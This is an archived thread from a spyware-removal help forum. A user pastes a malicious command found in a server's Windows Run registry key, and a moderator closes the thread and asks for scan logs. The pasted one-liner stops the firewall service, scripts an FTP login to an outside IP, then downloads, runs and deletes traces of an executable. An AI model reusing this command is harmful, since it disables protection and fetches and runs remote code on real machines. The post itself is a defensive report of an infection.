Spyware Warrior Spyware Warrior
Help with Spyware, Hijacking & Other Internet Nuisances
 
FAQ :: Search :: Memberlist :: Usergroups :: Register
Profile :: Log in to check your private messages :: Log in

suspect infection

 
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Spyware Warrior Forum Index -> Archived Spyware Removal Help Topics
View previous topic :: View next topic  
Author Message
paulrw
Newbie


Joined: 05 Mar 2012
Last Visit: 05 Mar 2012
Posts: 1
Location: Liverpool England

PostPosted: Mon Mar 05, 2012 6:52 am    Post subject: suspect infection Reply with quote

logging on to a clients server today I noticed a command window appear briefly. Hunting it down I found this in the registry (HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run)

c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 210.76.97.212> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get x.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&x.exe&x.exe&del cmd.txt /q /f&exi

which looks to me to be creating a command file to download and run a program, deleting itself after running. This is not found by antivirus/malware programs I have run. Anyone know of it, and anything else it may have left about the place?
I don't know if this is the correct place to post this, but it seems that if you don't know of it, maybe you should! the FTP site resolves to an address in China. I have deleted the registry key. I have also found some spurious users on the system with admin rights, so I presume this program is creating a backdoor to the system
_________________
Paul Wilkie
Back to top
View user's profile Send private message Visit poster's website
Cypher
Moderator


Joined: 05 Jul 2009
Last Visit: 16 Oct 2014
Posts: 4680
Location: Land Of The Leprechauns

PostPosted: Mon Mar 05, 2012 7:04 am    Post subject: Reply with quote

By posting just a description of your problems it is likely that your post will be passed by and you will not receive the help you're looking for.

We need to know what's running on your computer so that we can give you appropriate instructions, and this information is provided by DDS logs.

This thread will now be closed.

If you still need help, please start a new thread with:-

  • DDS logs.
  • Details of the problems you're experiencing.
  • Any messages or error codes you may have got.

If for any reason you can't run DDS, please let us know in your post.

Details for running a DDS scan can be found ........... HERE
_________________
Admin/Teacher at Malware Removal University
Member of...

Back to top
View user's profile Send private message
Display posts from previous:   
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Spyware Warrior Forum Index -> Archived Spyware Removal Help Topics All times are GMT - 8 Hours
Page 1 of 1

 
Jump to:  
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



smartBlue Style © 2002 Smartor
Powered by phpBB © 2001, 2002 phpBB Group